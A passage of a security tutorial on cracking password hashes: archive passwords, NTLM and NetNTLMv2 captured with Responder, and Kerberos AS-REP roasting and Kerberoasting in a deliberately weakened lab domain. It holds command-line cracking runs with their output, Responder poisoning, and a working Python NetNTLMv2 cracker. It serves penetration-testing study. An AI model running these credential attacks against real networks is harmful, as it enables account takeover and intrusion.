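Replace SAMPLE_TOKEN with a captured token and WORDLIST with jwt.secrets.list; with a recovered secret, forge() produces tokens the server will accept until the key is rotated, which is the impact to report. The alg check is deliberate: an RS256 token has no shared secret to find, and alg=none is a separate bug that needs no cracking at all.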

PKZIP - $pkzip2

# (ubuntu) sudo apt-get install fcrackzip 
# (mac) brew install fcrackzip
# -D dictionary mode, -p wordlist file, -u verify each hit by actually unzipping (the short check value in legacy PKZIP encryption alone gives false positives)
fcrackzip -u -D -p ~/HackTools/Dict/rockyou.txt ez_sign.zip
-----
PASSWORD FOUND!!!!: pw == 123456

# Crack with John the Ripper - zip2john
zip2john ez_sign.zip > zip.john
-----
cat zip.john
ez_sign.zip:$pkzip2$3*1*1*0*8*24*6f5f*8c57*96efce3ba8f42df5100275b25b34189c24506195b837da194a398d37debe7c6fa32dce9a*1*0*8*24*97cf*716c*6e1f48559e23d1efab2d8d181d788dbe0466eb53ae2a4dea03b6582a49defcee8b9a644f*2*0*6a*9b*224ac2c9*59665*2f*8*6a*224a*86eb*cac9ee9362cc24b1f6f29b67f073f86ea4457b208ef8843c5205d31792505c15b30c7031b7fa7c0e355067a0e5757b4976cd8584eff13c42156377ccdb92d7fb7438d562d48ffd97173d888a610a00d48bc4e2a7664b3c3b79c104e1f10430fdf2ead69cf7983dbb6c65*$/pkzip2$::ez_sign.zip:ez_sign/part3.zip, ez_sign/part2.pcapng, ez_sign/part1.jpg:ez_sign.zip
-----
john zip.john --wordlist=password_10w.txt
-----
john zip.john --show
ez_sign.zip:123456::ez_sign.zip:ez_sign/part3.zip, ez_sign/part2.pcapng, ez_sign/part1.jpg:ez_sign.zip
1 password hash cracked, 0 left

WinZip - $zip2

# Crack with hashcat
hashcat -m 13600 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$:lovehurts

7-Zip - $7z

# Generate a .7z file, password 12345 (-p with no value prompts for the password instead of leaving it in shell history)
7z a file.7z jwt.txt -t7z -p

# Crack with Hashcat
(kali) 7z2john file.7z > 7z.hash
-----
cat 7z.hash
file.7z:$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00
-----
# file.7z:$7z$2$19$... for John the Ripper
# $7z$2$19$... for Hashcat: strip the "file.7z:" prefix, or keep it and pass --username so hashcat treats the prefix as the user field
------
hashcat -m 11600 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00:12345

# Crack with John the Ripper
# file.7z:$7z$2$19$0$$16$efaf9d6baa7904b3b036e662682ab20b$179887464$160$153$dd4c47f4760d13ba9c787f5164359c4364e5521a5827540667d3fc77275b6aaebebd3e830534fdd04a56d50381117dfb83ed5d33258aca9aefa2466e62b566341f3b836902162b344ea186904a5ce2cbbb82bf46d697498f2ebd9350a77e311756323c8d8984522e78cf7edcb1384bdd51f080819718ca20c948cd980aec5a85777e457099ede588c82b1778a3a145eb7ae4ddd6034b7f197cea34b8d29f6b8f$155$00
john --format=7z --wordlist=~/HackTools/Dict/rockyou.txt hashes.txt
john hashes.txt --show
file.7z:12345

RAR5 - $rar5

# Generate a .rar file, password 12345
# (mac) brew install --cask rar
rar a -p12345 file.rar example.txt

# Crack with Hashcat
rar2john file.rar > rar.hash
-----
cat rar.hash
file.rar:$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46
# only the hash is the input
# file.rar:$rar5$16$eba9202c2... for John the Ripper
# $rar5$16$eba9202c2... for Hashcat (strip the "file.rar:" prefix, or keep it and pass --username)
hashcat -m 13000 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46:12345

# Crack with John the Ripper
# file.rar:$rar5$16$eba9202c2dde739ad93698c92884a65a$15$5486d4941a022f8f847b23421ff5f006$8$2a736b197dcada46
john --format=RAR5 --wordlist=~/HackTools/Dict/rockyou.txt hashes.txt
john hashes.txt --show
file.rar:12345

Attack traffic analysis - Traffic Analysis

NTLM - Pass the Hash

If you have already obtained NTLM hashes, e.g. with secretsdump (format user:RID:LM hash:NT hash:::; an LM field of aad3b435b51404eeaad3b435b51404ee is the LM hash of the empty string, i.e. LM hashes are not stored):

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9b6527a2fa104886453b3b75bc0da9d6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8b7826266691cea4d51be740356a25d2:::
npc.com\three:1106:aad3b435b51404eeaad3b435b51404ee:465590ccb4be6340bc749c34dfc34630:::
npc.com\four:1108:aad3b435b51404eeaad3b435b51404ee:7506130ff1e526312f70f5896bc11e29:::
WIN-VAH4GJKI11G$:1000:aad3b435b51404eeaad3b435b51404ee:b8085d0250629350db7a53ac9d7fedae:::
THREE-PC$:1107:aad3b435b51404eeaad3b435b51404ee:9b0728769dc8342ae1e934c91aa9b9b2:::
WIN-BLTKDCAFMQ7$:1109:aad3b435b51404eeaad3b435b51404ee:e6eed8a106839d302db37e1c4ff746be:::

then you can try cracking them with Hashcat (provided the plaintext is in your wordlist). For pass-the-hash itself the NT hash is used directly and no cracking is needed; cracking only matters where the cleartext is required:

# Crack with Hashcat
hashcat -m 1000 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
9b6527a2fa104886453b3b75bc0da9d6:Hello1234
465590ccb4be6340bc749c34dfc34630:Hello33

The attack traffic generated by secretsdump looks as follows:

NetNTLMv2 - Responder capture (LLMNR/NBT-NS poisoning)

If you have captured NetNTLMv2 responses with Responder (it answers poisoned LLMNR/NBT-NS name lookups so the victim authenticates to its SMB listener; the capture itself involves no relay):

python Responder.py -I eth1
-----
[*] [NBT-NS] Poisoned answer sent to 192.168.111.149 for name WIN-TEST (service: File Server)
[SMB] NTLMv2-SSP Client   : 192.168.111.149
[SMB] NTLMv2-SSP Username : NPC\three
[SMB] NTLMv2-SSP Hash     : three::NPC:34207bdf6b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

then you can try cracking it with Hashcat (provided the plaintext is in your wordlist). Responder's NTLMv2-SSP Hash line is already in the -m 5600 format and can be saved to hashes.txt as is. Unlike the NT hash above, a NetNTLMv2 response cannot be passed; it is only useful cracked, or relayed while the connection is live:

# Crack with Hashcat
hashcat -m 5600 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

The corresponding traffic of the client authenticating towards the domain controller is shown below. If all you have is a packet capture, the same line can be assembled from it: the server challenge comes from the NTLMSSP CHALLENGE message (Type 2), and the username, domain and NTLMv2 response (the 16-byte NTProofStr followed by the blob) come from the AUTHENTICATE message (Type 3):

# username::domain:challenge:HMAC-MD5:blob
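The fields of that line map onto NTLMSSP as described, and the check hashcat performs on them is short enough to write out. The block below is an added example, not code from the article, Responder or hashcat. It builds a -m 5600 line from constructed values (user three, domain NPC and password Hello123 from the lab setup later in the article; an arbitrary server and client challenge, timestamp and a minimal AV-pair blob, all made up here) and then cracks it with a small candidate list. It is standard-library Python; MD4 is implemented inline because hashlib on OpenSSL 3 builds usually has no md4.

```python
# Added example (not from the original article): assemble a hashcat -m 5600
# line from the fields a capture gives you, then run the same check hashcat
# performs on it. Standard library only; MD4 (needed for the NT hash) is
# implemented inline because OpenSSL 3 builds of hashlib often lack it.
# Every sample value (user, domain, challenges, blob) is constructed here.
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; NT hash = md4(password.encode('utf-16le'))."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda v, n: ((v << n) | (v >> (32 - n))) & mask
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates the old d
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as defined in MS-NLMP: the 16-byte HMAC-MD5 hashcat compares against."""
    # NTOWFv2: the user name is upper-cased, the domain/target name is used as sent
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def build_blob(client_challenge: bytes, timestamp: int, av_domain: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE structure: version, timestamp, client nonce, AV pairs."""
    av_pairs = struct.pack("<HH", 2, 2 * len(av_domain)) + av_domain.encode("utf-16le")  # MsvAvNbDomainName
    av_pairs += struct.pack("<HH", 0, 0)  # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def hashcat_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    # username::domain:challenge:HMAC-MD5:blob, the layout Responder prints
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_line(line: str, candidates):
    """Dictionary attack on one -m 5600 line; returns the password or None."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    server_challenge, proof, blob = (bytes.fromhex(v) for v in (chal_hex, proof_hex, blob_hex))
    for password in candidates:
        if hmac.compare_digest(ntlmv2_proof(password, user, domain, server_challenge, blob), proof):
            return password
    return None


# Constructed capture: what the CHALLENGE (server nonce) and AUTHENTICATE
# (user, domain, NTProofStr, blob) messages would yield for user three.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = build_blob(bytes.fromhex("a1b2c3d4e5f60718"), 133_000_000_000_000_000, "NPC")
SAMPLE_LINE = hashcat_line("three", "NPC", SERVER_CHALLENGE,
                           ntlmv2_proof("Hello123", "three", "NPC", SERVER_CHALLENGE, SAMPLE_BLOB), SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_line(SAMPLE_LINE, ["123456", "Hello1234", "Hello123"]))
```

crack_line mirrors what hashcat -m 5600 does per candidate: NT hash, NTLMv2 key, HMAC-MD5 over challenge || blob, compare with NTProofStr. Because the user and domain are bound into the key, the line must carry them exactly as captured (the user upper-cased internally, the domain untouched); editing either field silently makes the hash uncrackable.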

Cracking Kerberos hashes - Hash Cracking with Kerberos

Kerberos setup - Infrastructure

Building a Kerberos lab

Before the experiments, set up a Kerberos (Active Directory) environment and configure the preconditions for the domain attacks that follow:

# DOMAIN
NPC.COM

# DC
[ip addr]  192.168.111.146 
[username] npc.com/Administrator
[password] Hello1234 # can be cracked with rockyou.txt

# THREE-PC
[ip addr]  192.168.111.149 
[username] npc.com/three
[password] Hello123 # can be cracked with rockyou.txt

Kerberos authentication flow

Simplified Kerberos authentication flow:

  1. AS-REQ: the client asks the AS on the KDC (normally a domain controller) for a TGT. With pre-authentication the request carries a timestamp encrypted with the user's key (PA-ENC-TIMESTAMP); this is what a $krb5pa hash is built from.
  2. AS-REP: after authenticating the client, the KDC issues the TGT. The enc-part of the reply is encrypted with the user's key, which is what AS-REP Roasting ($krb5asrep) attacks.
  3. TGS-REQ: the client uses the TGT to ask the TGS on the KDC for a service ticket (ST) for a given SPN.
  4. TGS-REP: the KDC issues the ST, encrypted with the service account's key; this is what Kerberoasting ($krb5tgs) attacks.
  5. AP-REQ: the client presents the ST to the service.
  6. verify_PAC_REQ (optional): if the service needs to validate the PAC_PRIVSVR_CHECKSUM signature, it sends the PAC signature from the ST to the KDC for verification.
  7. PAC_verified_REP (optional): the KDC returns the verification result.
  8. AP-REP (optional): with mutual authentication, the service replies to the client and serves the resource.

Terms:

  • DC: Domain Controller.
  • KDC: Key Distribution Center, the ticket-issuing service behind the whole authentication process; it consists of two services, the AS and the TGS.
  • AD: Active Directory, which holds the domain's user database.
  • AS: Authentication Service.
  • TGT: Ticket Granting Ticket, issued by the AS.
  • TGS: Ticket Granting Service.
  • ST: Service Ticket, issued by the TGS.
  • SPN: Service Principal Name, the name a Kerberos client uses to uniquely identify a service instance on a particular host.

Preconditions for AS-REP Roasting

Precondition for the AS-REP Roasting attack:

  • A domain user has "Do not require Kerberos preauthentication" enabled (UF_DONT_REQUIRE_PREAUTH, 0x400000 in userAccountControl)

So we need to set "Do not require Kerberos preauthentication" on some domain user; here the user three is configured:

1. Open Active Directory Users and Computers;
2. Click the relevant OU (organizational unit) and find the user account to modify, e.g. three;
3. Right-click the account, choose "Properties", open the "Account" tab and tick "Do not require Kerberos preauthentication" under account options;
4. Click Apply.

Preconditions for Kerberoasting

Precondition for the Kerberoasting attack:

  • A service registered in the domain with an SPN, with the SPN bound to a user account (tickets for computer accounts are encrypted with long random machine passwords and are not practically crackable)

So we need to configure a service and register an SPN. Using IIS as the example (any other service works too):

1. Open Server Manager, choose "Add Roles" from the dashboard, tick "Web Server (IIS)" and install the management tools;
2. In Server Manager choose "Roles" -> "Web Server (IIS)" -> "Internet Information Services (IIS) Manager", add and configure a site, e.g. a site named test;
3. Select test, open Authentication, enable "Windows Authentication" and disable "Anonymous Authentication";
4. Register the SPN on the user account the service runs as (binding it to a user account is what makes the ST crackable):
    setspn -s HTTP/npc.com npc\three
5. Query the SPNs registered for that account:
    setspn -L three

To test, browse to the site; if it prompts for authentication, the setup is complete:

Basic structure - Hash Format

Kerberos-related hash structures and examples:

# Sample password hash encoding strings in Kerberos
$krb5pa: Kerberos 5, AS-REQ Pre-Auth (the encrypted timestamp; yields the requesting user's password)
$krb5: Kerberos 5, TGT (John format)
$krb5asrep: Kerberos 5, AS-REP (the enc-part of the reply, encrypted with the user's key; AS-REP Roasting)
$krb5tgs: Kerberos 5, TGS-REP (the service ticket, encrypted with the service account's key; Kerberoasting)

Example hashes crackable with Hashcat:

# https://hashcat.net/wiki/doku.php?id=example_hashes
# The password for all example hashes is hashcat.
# etype 23 (RC4-HMAC) is keyed directly with the NT hash, so these modes crack far faster than the AES ones.
# etype 17/18 (AES128/AES256-CTS-HMAC-SHA1-96) derive the key with PBKDF2-HMAC-SHA1 (4096 iterations by default, salt = uppercase realm + username), so they crack orders of magnitude slower; when requesting tickets, ask for RC4 where the target still allows it.
# [Kerberos 5 Pre-Auth] hashcat
# 7500  Kerberos 5, etype 23, AS-REQ Pre-Auth
# $krb5pa$23$<username>$<realm>$<salt>$<hash>
$krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363631363132333238383835
# 19800 Kerberos 5, etype 17, Pre-Auth  
# $krb5pa$17$<username>$<realm>$<hash>
$krb5pa$17$hashcat$HASHCATDOMAIN.COM$a17776abe5383236c58582f515843e029ecbff43706d177651b7b6cdb2713b17597ddb35b1c9c470c281589fd1d51cca125414d19e40e333
# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>
$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770

# [Kerberos 5 AS-REP] hashcat
# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]
$krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac

# [Kerberos 5 TGS-REP] hashcat
# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]
$krb5tgs$23$*user$realm$test/spn*$63386d22d359fe42230300d56852c9eb$891ad31d09ab89c6b3b8c5e5de6c06a7f49fd559d7a9a3c32576c8fedf705376cea582ab5938f7fc8bc741acf05c5990741b36ef4311fe3562a41b70a4ec6ecba849905f2385bb3799d92499909658c7287c49160276bca0006c350b0db4fd387adc27c01e9e9ad0c20ed53a7e6356dee2452e35eca2a6a1d1432796fc5c19d068978df74d3d0baf35c77de12456bf1144b6a750d11f55805f5a16ece2975246e2d026dce997fba34ac8757312e9e4e6272de35e20d52fb668c5ed
# 19600 Kerberos 5, etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96) 
# $krb5tgs$17$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$17$user$realm$ae8434177efd09be5bc2eff8$90b4ce5b266821adc26c64f71958a475cf9348fce65096190be04f8430c4e0d554c86dd7ad29c275f9e8f15d2dab4565a3d6e21e449dc2f88e52ea0402c7170ba74f4af037c5d7f8db6d53018a564ab590fc23aa1134788bcc4a55f69ec13c0a083291a96b41bffb978f5a160b7edc828382d11aacd89b5a1bfa710b0e591b190bff9062eace4d26187777db358e70efd26df9c9312dbeef20b1ee0d823d4e71b8f1d00d91ea017459c27c32dc20e451ea6278be63cdd512ce656357c942b95438228e
# 19700 Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96) 
# $krb5tgs$18$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$18$user$realm$8efd91bb01cc69dd07e46009$7352410d6aafd72c64972a66058b02aa1c28ac580ba41137d5a170467f06f17faf5dfb3f95ecf4fad74821fdc7e63a3195573f45f962f86942cb24255e544ad8d05178d560f683a3f59ce94e82c8e724a3af0160be549b472dd83e6b80733ad349973885e9082617294c6cbbea92349671883eaf068d7f5dcfc0405d97fda27435082b82b24f3be27f06c19354bf32066933312c770424eb6143674756243c1bde78ee3294792dcc49008a1b54f32ec5d5695f899946d42a67ce2fb1c227cb1d2004c0

Example hashes crackable with John the Ripper:

# https://openwall.info/wiki/john/sample-hashes
# or command: john --list=format-details
# [Kerberos 5 AS-REQ Pre-Auth] 
# krb5pa-sha1: Kerberos 5 AS-REQ Pre-Auth etype 17/18
$krb5pa$18$user1$EXAMPLE.COM$$2a0e68168d1eac344da458599c3a2b33ff326a061449fcbc242b212504e484d45903c6a16e2d593912f56c93883bf697b325193d62a8be9c
# krb5pa-md5: Kerberos 5 AS-REQ Pre-Auth etype 23
$krb5pa$23$user$realm$salt$afcbe07c32c3450b37d0f2516354570fe7d3e78f829e77cdc1718adf612156507181f7daeb03b6fbcfe91f8346f3c0ae7e8abfe5
# krb5: Kerberos v5 TGT
$krb5$oskov$ACM.UIUC.EDU$4730d7249765615d6f3652321c4fb76d09fb9cd06faeb0c31b8737f9fdfcde4bd4259c31cb1dff25df39173b09abdff08373302d99ac09802a290915243d9f0ea0313fdedc7f8d1fae0d9df8f0ee6233818d317f03a72c2e77b480b2bc50d1ca14fba85133ea00e472c50dbc825291e2853bd60a969ddb69dae35b604b34ea2c2265a4ffc72e9fb811da17c7f2887ccb17e2f87cd1f6c28a9afc0c083a9356a9ee2a28d2e4a01fc7ea90cc8836b8e25650c3a1409b811d0bad42a59aa418143291d42d7b1e6cb5b1876a4cc758d721323a762e943f774630385c9faa68df6f3a94422f97
# krb5asrep: Kerberos 5 AS-REP etype 17/18/23
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
# krb5tgs: Kerberos 5 TGS etype 23
$krb5tgs$23$74809c4c83c3c8279c6058d2f206ec2f$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$SOURCE_HASH$34c4849062f4b75b1e3f2a6e0f463fa0

Examples and cracking - Examples and Cracking

Kerberos AS-REQ Pre-Auth - $krb5pa

# [Kerberos 5 Pre-Auth] hashcat
# 7500  Kerberos 5, etype 23, AS-REQ Pre-Auth
# $krb5pa$23$<username>$<realm>$<salt>$<hash>
$krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363631363132333238383835
# 19800 Kerberos 5, etype 17, Pre-Auth  
# $krb5pa$17$<username>$<realm>$<hash>
$krb5pa$17$hashcat$HASHCATDOMAIN.COM$a17776abe5383236c58582f515843e029ecbff43706d177651b7b6cdb2713b17597ddb35b1c9c470c281589fd1d51cca125414d19e40e333
# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>
$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770

# Crack with Hashcat
hashcat -m 7500 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$krb5pa$23$user$realm$salt$034acfc70afba542690b8bc912fcd7fed6a848493a3ff0d7af641a263b71dcc72902995df4085ba458b733d8092e6b348e3e3990:frank
-----
hashcat -m 19900 -a 0 hashes.txt password_10w.txt --show
$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770:hashcat

# Crack with John the ripper
# krb5pa-sha1: Kerberos 5 AS-REQ Pre-Auth etype 17/18
$krb5pa$18$user1$EXAMPLE.COM$$2a0e68168d1eac344da458599c3a2b33ff326a061449fcbc242b212504e484d45903c6a16e2d593912f56c93883bf697b325193d62a8be9c
# krb5pa-md5: Kerberos 5 AS-REQ Pre-Auth etype 23
$krb5pa$23$user$realm$salt$afcbe07c32c3450b37d0f2516354570fe7d3e78f829e77cdc1718adf612156507181f7daeb03b6fbcfe91f8346f3c0ae7e8abfe5
john --wordlist=~/HackTools/Dict/rockyou.txt --format=krb5pa-md5 hashes.txt
john hashes.txt --show
?:John

Kerberos AS-REP - $krb5asrep

# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG:58f5daa35b023bedcd992977d0918e72$1f8454f8342afbfab303143aab7ef1abc15adad29062e34674fd7293716fa69051ed168dd90afcdc4c91cde9c44e56c0fd8d015ae019478e3d511ad9cccba01d4535a7756207148eac8793346d827b7d95d0158bdad1688b3e11c656bb992a64a2d871afe3c0800c32a1f5f1272a82345f71147d80c269b73d83e46cb81bf3c80149c9494a24a4f97b56f9e89d2bc32c89892dff960961efb782caeaa6d093eff542e57adc1fa222048f0c1a1a8fa3da7053c3a68d094ad64612bdb7f4e55c900105e3fcf2449ec7aab1927f3a2cf2f21aaaa6804055c85d11f599d651085c22ea944b5db0733437

# Crack with Hashcat
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG:58f5daa35b023bedcd992977d0918e72$1f8454f8342afbfab303143aab7ef1abc15adad29062e34674fd7293716fa69051ed168dd90afcdc4c91cde9c44e56c0fd8d015ae019478e3d511ad9cccba01d4535a7756207148eac8793346d827b7d95d0158bdad1688b3e11c656bb992a64a2d871afe3c0800c32a1f5f1272a82345f71147d80c269b73d83e46cb81bf3c80149c9494a24a4f97b56f9e89d2bc32c89892dff960961efb782caeaa6d093eff542e57adc1fa222048f0c1a1a8fa3da7053c3a68d094ad64612bdb7f4e55c900105e3fcf2449ec7aab1927f3a2cf2f21aaaa6804055c85d11f599d651085c22ea944b5db0733437:Adm12geC

# Crack with John the ripper
# 58f5daa35b023bedcd992977d0918e72$1f8454f8342afbfab303143aab7ef1abc15adad29062e34674fd7293716fa69051ed168dd90afcdc4c91cde9c44e56c0fd8d015ae019478e3d511ad9cccba01d4535a7756207148eac8793346d827b7d95d0158bdad1688b3e11c656bb992a64a2d871afe3c0800c32a1f5f1272a82345f71147d80c269b73d83e46cb81bf3c80149c9494a24a4f97b56f9e89d2bc32c89892dff960961efb782caeaa6d093eff542e57adc1fa222048f0c1a1a8fa3da7053c3a68d094ad64612bdb7f4e55c900105e3fcf2449ec7aab1927f3a2cf2f21aaaa6804055c85d11f599d651085c22ea944b5db0733437
john --wordlist=~/HackTools/Dict/rockyou.txt --format=krb5asrep hashes.txt
john hashes.txt --show
?:Adm12geC

Kerberos TGS-REP - $krb5tgs

# [Kerberos 5 TGS-REP] hashcat
# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]
$krb5tgs$23$*user$realm$test/spn*$63386d22d359fe42230300d56852c9eb$891ad31d09ab89c6b3b8c5e5de6c06a7f49fd559d7a9a3c32576c8fedf705376cea582ab5938f7fc8bc741acf05c5990741b36ef4311fe3562a41b70a4ec6ecba849905f2385bb3799d92499909658c7287c49160276bca0006c350b0db4fd387adc27c01e9e9ad0c20ed53a7e6356dee2452e35eca2a6a1d1432796fc5c19d068978df74d3d0baf35c77de12456bf1144b6a750d11f55805f5a16ece2975246e2d026dce997fba34ac8757312e9e4e6272de35e20d52fb668c5ed
# 19600 Kerberos 5, etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96) 
# $krb5tgs$17$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$17$user$realm$ae8434177efd09be5bc2eff8$90b4ce5b266821adc26c64f71958a475cf9348fce65096190be04f8430c4e0d554c86dd7ad29c275f9e8f15d2dab4565a3d6e21e449dc2f88e52ea0402c7170ba74f4af037c5d7f8db6d53018a564ab590fc23aa1134788bcc4a55f69ec13c0a083291a96b41bffb978f5a160b7edc828382d11aacd89b5a1bfa710b0e591b190bff9062eace4d26187777db358e70efd26df9c9312dbeef20b1ee0d823d4e71b8f1d00d91ea017459c27c32dc20e451ea6278be63cdd512ce656357c942b95438228e
# 19700 Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96) 
# $krb5tgs$18$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$18$user$realm$8efd91bb01cc69dd07e46009$7352410d6aafd72c64972a66058b02aa1c28ac580ba41137d5a170467f06f17faf5dfb3f95ecf4fad74821fdc7e63a3195573f45f962f86942cb24255e544ad8d05178d560f683a3f59ce94e82c8e724a3af0160be549b472dd83e6b80733ad349973885e9082617294c6cbbea92349671883eaf068d7f5dcfc0405d97fda27435082b82b24f3be27f06c19354bf32066933312c770424eb6143674756243c1bde78ee3294792dcc49008a1b54f32ec5d5695f899946d42a67ce2fb1c227cb1d2004c0

# Crack with Hashcat
# 13100 Kerberos 5, etype 23, TGS-REP
hashcat -m 13100 -a 0 hashes.txt ~/HackTools/Dict/dic.txt --show
$krb5tgs$23$*user$realm$test/spn*$63386d22d359fe42230300d56852c9eb$891ad31d09ab89c6b3b8c5e5de6c06a7f49fd559d7a9a3c32576c8fedf705376cea582ab5938f7fc8bc741acf05c5990741b36ef4311fe3562a41b70a4ec6ecba849905f2385bb3799d92499909658c7287c49160276bca0006c350b0db4fd387adc27c01e9e9ad0c20ed53a7e6356dee2452e35eca2a6a1d1432796fc5c19d068978df74d3d0baf35c77de12456bf1144b6a750d11f55805f5a16ece2975246e2d026dce997fba34ac8757312e9e4e6272de35e20d52fb668c5ed:hashcat
# 19600 Kerberos 5, etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96)
hashcat -m 19600 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt
# 19700 Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96)
hashcat -m 19700 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt

# Crack with John the ripper
john hashes.txt --format=krb5tgs --wordlist=~/HackTools/Dict/dic.txt
john hashes.txt --show
